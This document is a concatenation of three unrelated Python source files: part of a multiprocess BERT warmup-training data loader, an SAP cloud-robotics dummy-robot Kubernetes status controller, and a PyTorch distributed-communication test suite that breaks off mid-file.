fi = open(args.train_file, 'rb')
cache = [None] * 10000
first_time = True
lemmatizer = WordNetLemmatizer()
translator = str.maketrans(string.punctuation, ' '*len(string.punctuation))
tokenizer = BertTokenizer.from_pretrained(
args.tokenizer, do_lower_case=args.do_lower_case)
chunked_start, chunked_end = start_end_list[process_num]
print("chunked_start, chunked_end", chunked_start, chunked_end)
run_to_eof = False
while True:
#print('first_time:', first_time)
#sys.stdout.flush()
if first_time:
fi.seek(int(offset))
first_time = False
if chunked_start > chunked_end:
run_to_eof = True
elif run_to_eof and chunked_start > chunked_end:
fi.seek(0)
#print("chunked_start, chunked_end, ptr",
# chunked_start, chunked_end, fi.tell())
run_to_eof = False
else:
if not loop:
print("reached the end of loop, flushing the cache...")
for insert_idx in range(len(cache)):
if cache[insert_idx] is not None:
q_list[process_num].put(cache[insert_idx])
q_list[process_num].put({
'feature': None,
'example': None,
'context_tok_set': None,
'finished': True
})
return
fi.seek(int(chunked_start))
if chunked_start > chunked_end:
run_to_eof = True
for line in fi:
if not run_to_eof and fi.tell() >= chunked_end:
break
try:
line = line.rstrip().decode('utf-8')
sample_json = json.loads(line)
except UnicodeDecodeError:
'''print(f"WARNING: one training line decode utf-8 ERROR")
print(line)
sys.stdout.flush()'''
continue
except json.decoder.JSONDecodeError as json_e:
'''print(f"WARNING: json.decoder.JSONDecodeError ERROR")
print(line)
print(json_e)
sys.stdout.flush()'''
continue
data_processor = PretrainingProcessor()
examples = data_processor.read_english_examples(
line_list=[line], is_training=True,
first_answer_only=True,
replace_mask="[unused1]",
do_lower_case=args.do_lower_case)
if len(examples) == 0:
continue
is_warmup, context_tok_set = warmup_sample_filter(
examples, stopwords,
jacc_thres = args.jacc_thres,
do_lower_case = args.do_lower_case,
warmup_window_size = args.warmup_window_size,
max_warmup_query_length = args.max_warmup_query_length,
lemmatizer = lemmatizer,
translator = translator,
neg_drop_rate = args.neg_drop_rate
)
if not is_warmup:
continue
train_features = data_processor.convert_english_examples_to_features(
examples=examples,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
doc_stride=args.doc_stride,
max_query_length=args.max_query_length,
is_training=True,
first_answer_only=True)
for feature in train_features:
insert_idx = np.random.randint(0, len(cache))
if cache[insert_idx] is None:
cache[insert_idx] = {
'feature': feature,
'example': sample_json,
'context_tok_set': context_tok_set,
'finished': False
}
else:
q_list[process_num].put(cache[insert_idx])
cache[insert_idx] = {
'feature': feature,
'example': sample_json,
'context_tok_set': context_tok_set,
'finished': False
}
del line
del sample_json
'''print('process_num', process_num)
print("chunked_start, chunked_end", chunked_start, chunked_end)
print("pointer", fi.tell())
print('line', line)'''
total_bytes = os.path.getsize(args.train_file)
print("train file total bytes: ", total_bytes)
q_list = [Queue(maxsize=32767) for _ in range(args.enqueue_thread_num)]
chunk_size = ((end - start) // args.enqueue_thread_num if end >= start
else (end - start + total_bytes) // args.enqueue_thread_num)
start_end_list = []
for i in range(args.enqueue_thread_num):
start_end_list.append(
((start + chunk_size * i) % total_bytes,
(start + chunk_size * (i + 1)) % total_bytes)
)
for i in range(args.enqueue_thread_num): # for fine tuning, thread num CAN be set 1.
# offset = i * np.random.rand() * total_bytes / (args.enqueue_thread_num + 1)
chunked_start, chunked_end = start_end_list[i]
#offset = chunked_start #np.random.rand() * (end - start) + start
offset = ((np.random.rand() * (chunked_end - chunked_start + total_bytes) + chunked_start) % total_bytes
if chunked_start > chunked_end else
(np.random.rand() * (chunked_end - chunked_start) + chunked_start) % total_bytes)
print("enqueue process started : ", i, offset, offset / total_bytes)
p = Process(target=enqueue, args=(q_list, offset, start_end_list, i, stopwords('en'), True))
p.start()
p_list.append(p)
return q_list
global_q_a_cn_list = None
global_q_b_cn_list = None
global_q_a_en_list = None
global_q_b_en_list = None
global_q = None
def get_warmup_training_batch_chinese(args, co_training: bool, p_list: list):
total_bytes = os.path.getsize(args.train_file)
global global_q_a_cn_list
global global_q_b_cn_list
split_byte = np.random.rand() * total_bytes
q_a_list = multi_process_get_warmup_data_queue_cn(args,
split_byte, (split_byte + total_bytes // 2) % total_bytes, p_list)
q_b_list = multi_process_get_warmup_data_queue_cn(args,
(split_byte + total_bytes // 2) % total_bytes, split_byte, p_list)
global_q_a_cn_list = q_a_list
global_q_b_cn_list = q_b_list
feature_buffer = []
batch_indicator = 0
q_ptr = 0
isfinished_set = set()
#fout = open('/Users/noble6emc2/Desktop/Tencent/BLANC/code/src/lm/BLANC/filter_10000.json', 'w', encoding = 'utf-8')
while True:
if len(isfinished_set) == args.enqueue_thread_num:
print("get_batch finished")
return
if q_ptr in isfinished_set:
q_ptr = (q_ptr + 1) % args.enqueue_thread_num
continue
q_a_res = q_a_list[q_ptr].get()
#print(q_a_res['example'])
if q_a_res['finished'] == True:
#print('q_a_finished')
isfinished_set.add(q_ptr)
continue
q_b_res = q_b_list[q_ptr].get()
if q_b_res['finished'] == True:
#print('q_b_finished')
isfinished_set.add(q_ptr)
continue
'''print('===================')
print(q_a_res['example'])
print(q_a_res['context_tok_set'])
print('===================')
print(q_b_res['example'])
print(q_b_res['context_tok_set'])'''
#fout.write(json.dumps(q_a_res['example'], ensure_ascii = False) + '\n')
#fout.write(json.dumps(q_b_res['example'], ensure_ascii = False) + '\n')
new_feature_a = q_a_res['feature']
new_feature_b = q_b_res['feature']
feature_buffer.append((new_feature_a,
new_feature_b))
#print('after q.get')
#sys.stdout.flush()
batch_indicator += 1
if batch_indicator == args.train_batch_size: # ignore the reminders
batch_input_ids = torch.tensor([f.input_ids for f, _ in feature_buffer], dtype=torch.long)
batch_input_mask = torch.tensor([f.input_mask for f, _ in feature_buffer], dtype=torch.long)
batch_segment_ids = torch.tensor([f.segment_ids for f, _ in feature_buffer], dtype=torch.long)
batch_start_positions = torch.tensor([f.start_positions for f, _ in feature_buffer], dtype=torch.long)
batch_end_positions = torch.tensor([f.end_positions for f, _ in feature_buffer], dtype=torch.long)
#print("------------co-training--------------")
#for feature, _ in feature_buffer:
# print(feature)
# break
#print(len(feature_buffer))
batch_a = batch_input_ids, batch_input_mask, batch_segment_ids, batch_start_positions, batch_end_positions
batch_input_ids = torch.tensor([f.input_ids for _, f in feature_buffer], dtype=torch.long)
batch_input_mask = torch.tensor([f.input_mask for _, f in feature_buffer], dtype=torch.long)
batch_segment_ids = torch.tensor([f.segment_ids for _, f in feature_buffer], dtype=torch.long)
batch_start_positions = torch.tensor([f.start_positions for _, f in feature_buffer], dtype=torch.long)
batch_end_positions = torch.tensor([f.end_positions for _, f in feature_buffer], dtype=torch.long)
#print("-------------co-training-------------")
#for _, feature in feature_buffer:
# print(feature)
# break
#print(len(feature_buffer))
batch_b = batch_input_ids, batch_input_mask, batch_segment_ids, batch_start_positions, batch_end_positions
if co_training:
yield batch_a, batch_b
else:
yield batch_a
yield batch_b
batch_indicator = 0
feature_buffer = []
q_ptr = (q_ptr + 1) % args.enqueue_thread_num
def get_warmup_training_batch_english(args, co_training: bool, p_list: list):
total_bytes = os.path.getsize(args.train_file)
global global_q_a_en_list
global global_q_b_en_list
split_byte = np.random.rand() * total_bytes
q_a_list = multi_process_get_warmup_data_queue_en(args,
split_byte, (split_byte + total_bytes // 2) % total_bytes, p_list)
q_b_list = multi_process_get_warmup_data_queue_en(args,
(split_byte + total_bytes // 2) % total_bytes, split_byte, p_list)
global_q_a_en_list = q_a_list
global_q_b_en_list = q_b_list
feature_buffer = []
batch_indicator = 0
q_ptr = 0
isfinished_set = set()
#fout = open('/Users/noble6emc2/Desktop/Tencent/BLANC/code/src/lm/BLANC/filter_10000_en_sspt.json', 'w', encoding = 'utf-8')
while True:
if len(isfinished_set) == args.enqueue_thread_num:
print("get_batch finished")
return
if q_ptr in isfinished_set:
q_ptr = (q_ptr + 1) % args.enqueue_thread_num
continue
q_a_res = q_a_list[q_ptr].get()
#print(q_a_res['example'])
if q_a_res['finished'] == True:
#print('q_a_finished')
isfinished_set.add(q_ptr)
continue
q_b_res = q_b_list[q_ptr].get()
if q_b_res['finished'] == True:
#print('q_b_finished')
isfinished_set.add(q_ptr)
continue
'''print('===================')
print(q_a_res['example'])
print(q_a_res['context_tok_set'])
print('===================')
print(q_b_res['example'])
print(q_b_res['context_tok_set'])'''
'''fout.write(json.dumps(q_a_res['example'], ensure_ascii = False) + '\n')
fout.write(json.dumps(q_b_res['example'], ensure_ascii = False) + '\n')'''
new_feature_a = q_a_res['feature']
new_feature_b = q_b_res['feature']
feature_buffer.append((new_feature_a,
new_feature_b))
#print('after q.get')
#sys.stdout.flush()
batch_indicator += 1
if batch_indicator == args.train_batch_size: # ignore the reminders
batch_input_ids = torch.tensor([f.input_ids for f, _ in feature_buffer], dtype=torch.long)
batch_input_mask = torch.tensor([f.input_mask for f, _ in feature_buffer], dtype=torch.long)
batch_segment_ids = torch.tensor([f.segment_ids for f, _ in feature_buffer], dtype=torch.long)
batch_start_positions = torch.tensor([f.start_positions for f, _ in feature_buffer], dtype=torch.long)
batch_end_positions = torch.tensor([f.end_positions for f, _ in feature_buffer], dtype=torch.long)
#print("------------co-training--------------")
#for feature, _ in feature_buffer:
# print(feature)
# break
#print(len(feature_buffer))
batch_a = batch_input_ids, batch_input_mask, batch_segment_ids, batch_start_positions, batch_end_positions
batch_input_ids = torch.tensor([f.input_ids for _, f in feature_buffer], dtype=torch.long)
batch_input_mask = torch.tensor([f.input_mask for _, f in feature_buffer], dtype=torch.long)
batch_segment_ids = torch.tensor([f.segment_ids for _, f in feature_buffer], dtype=torch.long)
batch_start_positions = torch.tensor([f.start_positions for _, f in feature_buffer], dtype=torch.long)
batch_end_positions = torch.tensor([f.end_positions for _, f in feature_buffer], dtype=torch.long)
#print("-------------co-training-------------")
#for _, feature in feature_buffer:
# print(feature)
# break
#print(len(feature_buffer))
batch_b = batch_input_ids, batch_input_mask, batch_segment_ids, batch_start_positions, batch_end_positions
if co_training:
yield batch_a, batch_b
else:
yield batch_a
yield batch_b
batch_indicator = 0
feature_buffer = []
q_ptr = (q_ptr + 1) % args.enqueue_thread_num
|
robot.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""DummyRobot robot controller."""
import logging
import datetime
import sys
import threading
import traceback
from copy import deepcopy
from kubernetes.client.rest import ApiException
from k8scrhandler.k8scrhandler import K8sCRHandler
from .dummyrobot import DummyRobot
from .helper import get_sample_cr, MainLoopController
_LOGGER = logging.getLogger(__name__)
class RobotController(K8sCRHandler):
"""DummyRobot robot controller."""
def __init__(self, dummy_robot: DummyRobot) -> None:
"""Construct."""
# Instance with Dummy robot
self._dummy_robot = dummy_robot
# Super constructor for robot CR
self.robot_template_cr = get_sample_cr('robco_robot')
super().__init__(
'registry.cloudrobotics.com',
'v1alpha1',
'robots',
'default',
self.robot_template_cr,
{}
)
# Init threads
self.robot_status_update_thread = threading.Thread(target=self._update_robot_status_loop)
def run(self, watcher: bool = True, reprocess: bool = False,
multiple_executor_threads: bool = False) -> None:
"""
Start running all callbacks.
Supporting multiple executor threads for blocking callbacks.
"""
super().run(watcher, reprocess, multiple_executor_threads)
# Start update thread
self.robot_status_update_thread.start()
def _update_robot_status_loop(self) -> None:
"""Run update robot status continiously."""
loop_control = MainLoopController()
_LOGGER.info('Watch robot status loop started')
while self.thread_run:
try:
self.update_robot_status()
loop_control.sleep(2)
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
_LOGGER.error(
'%s/%s: Error watching robot status - Exception: "%s" / "%s" - '
'TRACEBACK: %s', self.group, self.plural, exc_info[0], exc_info[1],
traceback.format_exception(*exc_info))
# On uncovered exception in thread save the exception
self.thread_exceptions['status_loop'] = exc
# Stop the watcher
self.stop_watcher()
_LOGGER.info('Watch robot status loop stopped')
def update_robot_status(self) -> None:
"""Update status of robot CR."""
# Update Dummy robot
self._dummy_robot.update()
# Update robot CR status
status = deepcopy(self.robot_template_cr)['status']
status['configuration']['trolleyAttached'] = self._dummy_robot.trolley_attached
status['robot']['batteryPercentage'] = self._dummy_robot.battery_percentage
status['robot']['lastStateChangeTime'] = self._dummy_robot.last_state_change
status['robot']['state'] = self._dummy_robot.state
status['robot']['updateTime'] = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
try:
self.update_cr_status(self._dummy_robot.robco_robot_name, status)
except ApiException:
_LOGGER.error(
'Status CR of robot %s could not be updated', self._dummy_robot.robco_robot_name)
|
test_distributed.py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import copy
import fcntl
import multiprocessing
import os
import sys
import time
import tempfile
import unittest
from contextlib import contextmanager
from datetime import timedelta
from functools import reduce, wraps
import torch
import torch.cuda
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from common_utils import TestCase, run_tests
from torch._utils_internal import TEST_MASTER_ADDR as MASTER_ADDR
from torch._utils_internal import TEST_MASTER_PORT as MASTER_PORT
import common_utils as common
BACKEND = os.environ["BACKEND"]
TEMP_DIR = os.environ["TEMP_DIR"]
INIT_METHOD = os.getenv("INIT_METHOD", "env://")
DEFAULT_TIMEOUT = 300
CUSTOMIZED_TIMEOUT = {"test_DistributedDataParallel": 500}
if INIT_METHOD.startswith("file://"):
FOLDER = INIT_METHOD[7:]
class _FC2(nn.Module):
def __init__(self):
super(_FC2, self).__init__()
self.fc = nn.Linear(10, 50, bias=True)
self.fc.bias.requires_grad = False
def forward(self, x):
x = self.fc(x)
return x
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = _FC2()
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(torch.Tensor([2, 2]).long(),
requires_grad=False)
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
DDP_NET = Net()
def get_timeout(test_id):
test_name = test_id.split(".")[-1]
if test_name in CUSTOMIZED_TIMEOUT:
return CUSTOMIZED_TIMEOUT[test_name]
else:
return DEFAULT_TIMEOUT
if not dist.is_available():
print("Distributed not available, skipping tests")
sys.exit(0)
SKIP_IF_NO_CUDA_EXIT_CODE = 75
SKIP_IF_NO_GPU_EXIT_CODE = 76
SKIP_IF_SMALL_WORLDSIZE_EXIT_CODE = 77
SKIP_IF_BACKEND_UNAVAILABLE = 78
def skip_if_no_cuda_distributed(func):
func.skip_if_no_cuda_distributed = True
@wraps(func)
def wrapper(*args, **kwargs):
if not torch.cuda.is_available():
sys.exit(SKIP_IF_NO_CUDA_EXIT_CODE)
return func(*args, **kwargs)
return wrapper
def skip_if_no_gpu(func):
""" Nccl multigpu tests requires at least 2 GPUS. Skip if this is not met"""
func.skip_if_no_gpu = True
@wraps(func)
def wrapper(*args, **kwargs):
if not torch.cuda.is_available():
sys.exit(SKIP_IF_NO_CUDA_EXIT_CODE)
if torch.cuda.device_count() < int(os.environ["WORLD_SIZE"]):
sys.exit(SKIP_IF_NO_GPU_EXIT_CODE)
return func(*args, **kwargs)
return wrapper
def skip_if_small_worldsize(func):
func.skip_if_small_worldsize = True
@wraps(func)
def wrapper(*args, **kwargs):
if (os.environ["BACKEND"] != "mpi") and int(os.environ["WORLD_SIZE"]) <= 2:
sys.exit(SKIP_IF_SMALL_WORLDSIZE_EXIT_CODE)
return func(*args, **kwargs)
return wrapper
def apply_hack_for_nccl():
# This is a hack for a known NCCL issue using multiprocess
# in conjunction with multiple threads to manage different GPUs which
# may cause ncclCommInitRank to fail.
# http://docs.nvidia.com/deeplearning/sdk/nccl-release-notes/rel_2.1.4.html#rel_2.1.4
# It slows down the performance of collective operations.
# Without this setting NCCL might throw unhandled error.
os.environ["NCCL_MAX_NRINGS"] = "1"
@contextmanager
def _lock():
lockfile = os.path.join(TEMP_DIR, "lockfile")
with open(lockfile, "w") as lf:
try:
fcntl.flock(lf.fileno(), fcntl.LOCK_EX)
yield
finally:
fcntl.flock(lf.fileno(), fcntl.LOCK_UN)
lf.close()
def _build_tensor(size, value=None):
if value is None:
value = size
return torch.FloatTensor(size, size, size).fill_(value)
class Barrier(object):
barrier_id = 0
@classmethod
def init(cls):
cls.barrier_id = 0
barrier_dir = os.path.join(TEMP_DIR, "barrier")
for f_name in os.listdir(barrier_dir):
os.unlink(os.path.join(barrier_dir, f_name))
@classmethod
def sync(cls, wait_for=None, timeout=5):
if wait_for is None:
wait_for = dist.get_world_size()
cls.barrier_id += 1
barrier_dir = os.path.join(TEMP_DIR, "barrier")
pid = str(os.getpid())
barrier_file = os.path.join(barrier_dir, pid)
with _lock():
with open(barrier_file, "w") as f:
f.write(str(cls.barrier_id))
start_time = time.time()
while True:
arrived = 0
with _lock():
for f_name in os.listdir(barrier_dir):
with open(os.path.join(barrier_dir, f_name), "r") as f:
data = f.read()
if int(data) >= cls.barrier_id:
arrived += 1
if arrived == wait_for:
break
if time.time() - start_time > timeout:
raise RuntimeError("barrier timeout")
time.sleep(0.1)
class _DistTestBase(object):
def _barrier(self, *args, **kwargs):
Barrier.sync(*args, **kwargs)
def _init_group_test(self, **kwargs):
group = [1, 2]
group_id = dist.new_group(group, **kwargs)
rank = dist.get_rank()
if rank not in group:
return ([], None, rank)
return (group, group_id, rank)
def _init_full_group_test(self, **kwargs):
group = [i for i in range(0, dist.get_world_size())]
group_id = dist.new_group(**kwargs)
rank = dist.get_rank()
return (group, group_id, rank)
def _init_global_test(self):
group = [i for i in range(0, dist.get_world_size())]
group_id = dist.group.WORLD
rank = dist.get_rank()
return (group, group_id, rank)
# HELPER FOR MULTIGPU TESTS
def _init_multigpu_helper(self):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
nGPUs = torch.cuda.device_count()
world_size = dist.get_world_size()
visible_devices = range(nGPUs)
if BACKEND == "nccl":
apply_hack_for_nccl()
nGPUs_per_process = nGPUs // world_size
rank_to_GPU = {
i: list(
visible_devices[i * nGPUs_per_process: (i + 1) * nGPUs_per_process]
)
for i in range(world_size)
}
return rank_to_GPU
# GET RANK
def test_get_rank(self):
test_dir = os.path.join(TEMP_DIR, "test_dir")
pid = str(os.getpid())
num_processes = dist.get_world_size()
with open(os.path.join(test_dir, pid), "w") as f:
f.write(str(dist.get_rank()))
self._barrier()
all_ranks = set()
for f_name in os.listdir(test_dir):
with open(os.path.join(test_dir, f_name), "r") as f:
all_ranks.add(int(f.read()))
self.assertEqual(len(all_ranks), num_processes)
self._barrier()
if dist.get_rank() == 0:
for f_name in os.listdir(test_dir):
os.unlink(os.path.join(test_dir, f_name))
self._barrier()
def test_get_backend(self):
if dist.get_world_size() > 2:
group = [1, 2]
else:
group = [0, 1]
group_id = dist.new_group(group)
backend_str = BACKEND.lower()
self.assertEqual(dist.get_backend(), backend_str)
if dist.get_rank() in group:
self.assertEqual(dist.get_backend(group_id), backend_str)
else:
with self.assertRaisesRegex(RuntimeError, "Invalid process group specified"):
dist.get_backend(group_id)
def test_Backend_enum_class(self):
# test parsing
backend = BACKEND.lower()
self.assertEqual(dist.Backend(BACKEND.upper()), backend)
self.assertEqual(dist.Backend(BACKEND), backend)
with self.assertRaisesRegex(ValueError, "Invalid backend: 'undefined'"):
dist.Backend("undefined")
with self.assertRaisesRegex(ValueError, "Invalid backend: 'xYz'"):
dist.Backend("xYz")
with self.assertRaises(ValueError):
dist.Backend(None)
with self.assertRaises(ValueError):
dist.Backend(3)
with self.assertRaises(ValueError):
dist.Backend(["gloo"])
# Test destroy
def test_destroy_group(self):
if dist.get_world_size() > 2:
group = [1, 2]
else:
group = [0, 1]
group_id = dist.new_group(group)
self._barrier()
dist.destroy_process_group(group_id)
# Test get rank and size of group
def test_get_rank_size_group(self):
if dist.get_world_size() > 2:
group = [1, 2]
else:
group = [0, 1]
group_id = dist.new_group(group)
if dist.get_rank() in group:
self.assertEqual(dist.get_world_size(group_id), 2)
self.assertTrue(dist.get_rank(group_id) in list(range(2)))
else:
self.assertEqual(dist.get_world_size(group_id), -1)
self.assertEqual(dist.get_rank(group_id), -1)
# Test destroy full groups
def test_destroy_full_group(self):
_, group_id, _ = self._init_full_group_test()
self._barrier()
dist.destroy_process_group(group_id)
# Test get rank and size of full group
def test_get_rank_size_full_group(self):
_, group_id, _ = self._init_full_group_test()
self.assertEqual(dist.get_world_size(group_id), dist.get_world_size())
self.assertEqual(dist.get_rank(group_id), dist.get_rank())
def _test_barrier_timeout(self, group_id, timeout):
local_rank = dist.get_rank(group_id)
# Only execute barrier on rank == 0, causing it to timeout
if local_rank == 0:
expected_time = time.time() + timeout.total_seconds()
with self.assertRaisesRegex(RuntimeError, " (Timed out|closed) "):
dist.barrier(group_id)
self.assertGreaterEqual(time.time(), expected_time)
else:
time.sleep(timeout.total_seconds())
@unittest.skipIf(BACKEND != "gloo", "Only gloo backend supports timeouts")
@unittest.skipIf(
not INIT_METHOD.startswith("file://"),
"Requires file:// initialization method. " +
"Both tcp:// and env:// rely on the TCP store for which "
"reinitialization has proven racy."
)
def test_barrier_timeout_global(self):
dist.destroy_process_group()
# Explicitly pass world size to the barrier because we've
# just destroyed any state in torch.distributed.
self._barrier(wait_for=int(WORLD_SIZE))
# Reinitialize global process group
timeout = timedelta(seconds=0.2)
dist.init_process_group(
init_method=INIT_METHOD,
backend=BACKEND,
world_size=int(WORLD_SIZE),
rank=self.rank,
timeout=timeout,
)
self._test_barrier_timeout(dist.group.WORLD, timeout)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND != "gloo", "Only gloo backend supports timeouts")
def test_barrier_timeout_group(self):
timeout = timedelta(seconds=0.2)
_, group_id, _ = self._init_group_test(timeout=timeout)
if group_id is not None:
self._test_barrier_timeout(group_id, timeout)
@unittest.skipIf(BACKEND != "gloo", "Only gloo backend supports timeouts")
def test_barrier_timeout_full_group(self):
timeout = timedelta(seconds=0.2)
_, group_id, _ = self._init_full_group_test(timeout=timeout)
if group_id is not None:
self._test_barrier_timeout(group_id, timeout)
# SEND RECV
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support send/recv")
def test_send_recv(self):
rank = dist.get_rank()
tensor = _build_tensor(rank + 1)
for src in range(0, dist.get_world_size()):
if src == rank:
# Send mode
for dst in range(0, dist.get_world_size()):
if dst == rank:
continue
dist.send(tensor, dst)
else:
# Recv mode
expected_tensor = _build_tensor(src + 1)
output_tensor = _build_tensor(src + 1, value=-1)
dist.recv(output_tensor, src)
self.assertEqual(output_tensor, expected_tensor)
self._barrier()
# SEND RECV ANY SOURCE
@unittest.skipIf(
BACKEND == "nccl", "Nccl does not support send/recv from any source"
)
def test_send_recv_any_source(self):
rank = dist.get_rank()
tensor = _build_tensor(10, value=rank)
recv_ranks = set()
for dst in range(0, dist.get_world_size()):
if dst == rank:
# Recv mode
for dst in range(0, dist.get_world_size()):
if dst == rank:
continue
output_tensor = _build_tensor(10, value=-1)
sender = dist.recv(output_tensor)
# Assert the scalar value "sender" that should be
# equal to the rank of the sender is equal to all
# values in the received tensor.
self.assertTrue(output_tensor.eq(sender).all())
recv_ranks.add(sender)
else:
# Send mode
dist.send(tensor, dst)
self.assertEqual(len(recv_ranks), dist.get_world_size() - 1)
self._barrier()
# SEND RECV WITH TAG
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support send/recv")
def test_send_recv_with_tag(self):
rank = dist.get_rank()
world_size = dist.get_world_size()
tensor = _build_tensor(10, value=rank)
for dst in range(0, world_size):
if dst == rank:
# Recv mode
for src in range(0, world_size):
if src == rank:
continue
output_tensor = _build_tensor(10, value=-1)
dist.recv(output_tensor, src, tag=src)
self.assertTrue(output_tensor.eq(src).all())
else:
# Send mode
dist.send(tensor, dst, tag=rank)
# ISEND
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support isend")
def test_isend(self):
rank = dist.get_rank()
world_size = dist.get_world_size()
if rank == 0:
requests = [
dist.isend(_build_tensor(dest, 10), dest)
for dest in range(1, world_size)
]
for request in requests:
request.wait()
self.assertTrue(request.is_completed())
else:
tensor = _build_tensor(rank, -1)
dist.recv(tensor, 0)
self.assertEqual(tensor, _build_tensor(rank, 10))
self._barrier()
# IRECV
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support irecv")
def test_irecv(self):
rank = dist.get_rank()
world_size = dist.get_world_size()
if rank == 0:
expected_tensors = [_build_tensor(src, -1) for src in range(1, world_size)]
requests = [
dist.irecv(expected_tensors[src - 1], src)
for src in range(1, world_size)
]
for src in range(1, world_size):
requests[src - 1].wait()
self.assertTrue(requests[src - 1].is_completed())
self.assertEqual(expected_tensors[src - 1], _build_tensor(src, 10))
else:
tensor = _build_tensor(rank, 10)
dist.send(tensor, 0)
self._barrier()
# BROADCAST
def _test_broadcast_helper(
self, group, group_id, rank, cuda=False, rank_to_GPU=None
):
for ttype, value, requires_cuda in [
("torch.FloatTensor", -1e-10, False),
("torch.DoubleTensor", -1e-100, False),
("torch.HalfTensor", -0.1, True),
("torch.CharTensor", -2, False),
("torch.ByteTensor", 129, False),
("torch.IntTensor", -1e5, False),
("torch.LongTensor", -1e15, False),
]:
if requires_cuda and not cuda:
continue
for src in group:
expected_tensor = _build_tensor(src + 1, value).type(ttype)
if cuda:
expected_tensor = expected_tensor.cuda(rank_to_GPU[rank][0])
if rank == src:
dist.broadcast(expected_tensor, src, group_id)
else:
tensor = _build_tensor(src + 1, -1).type(ttype)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.broadcast(tensor, src, group_id)
self.assertEqual(tensor.size(), expected_tensor.size())
self.assertEqual(tensor.ne(expected_tensor).max(), 0)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_broadcast(self):
group, group_id, rank = self._init_global_test()
self._test_broadcast_helper(group, group_id, rank)
@unittest.skipIf(
BACKEND != "gloo" and BACKEND != "nccl",
"Only Gloo and Nccl backend supports CUDA allReduce",
)
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_broadcast_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_broadcast_helper(group, group_id, rank, True, rank_to_GPU)
@skip_if_small_worldsize
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_broadcast_group(self):
group, group_id, rank = self._init_group_test()
self._test_broadcast_helper(group, group_id, rank)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_broadcast_full_group(self):
group, group_id, rank = self._init_full_group_test()
self._test_broadcast_helper(group, group_id, rank)
# REDUCE
def _test_reduce_helper(
self,
group,
group_id,
rank,
op,
master_value,
worker_value,
expected_value,
cuda=False,
rank_to_GPU=None,
):
for src in group:
if rank == src:
tensor = _build_tensor(src + 1).fill_(master_value)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.reduce(tensor, src, op, group_id)
self.assertEqual(tensor, _build_tensor(src + 1, expected_value))
else:
tensor = _build_tensor(src + 1).fill_(worker_value)
if cuda:
tensor = tensor.cuda(rank_to_GPU[rank][0])
dist.reduce(tensor, src, op, group_id)
self._barrier()
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_sum(self):
group, group_id, rank = self._init_global_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(BACKEND != "nccl", "Only Nccl supports CUDA reduce")
@skip_if_no_cuda_distributed
@skip_if_no_gpu
def test_reduce_sum_cuda(self):
group, group_id, rank = self._init_global_test()
rank_to_GPU = self._init_multigpu_helper()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + 10 * (len(group) - 1),
True,
rank_to_GPU,
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_product(self):
group, group_id, rank = self._init_global_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_min(self):
group, group_id, rank = self._init_global_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
def test_reduce_max(self):
group, group_id, rank = self._init_global_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MAX, -1, 10, 10)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
@skip_if_small_worldsize
def test_reduce_group_sum(self):
group, group_id, rank = self._init_group_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.SUM,
2,
10,
2 + (10 * (len(group) - 1)),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
@skip_if_small_worldsize
def test_reduce_group_product(self):
group, group_id, rank = self._init_group_test()
self._test_reduce_helper(
group,
group_id,
rank,
dist.ReduceOp.PRODUCT,
2,
10,
reduce((lambda x, y: x * y), [10] * (len(group) - 1), 2),
)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
@skip_if_small_worldsize
def test_reduce_group_min(self):
group, group_id, rank = self._init_group_test()
self._test_reduce_helper(group, group_id, rank, dist.ReduceOp.MIN, 1010, 1, 1)
@unittest.skipIf(BACKEND == "nccl", "Nccl does not support CPU tensors")
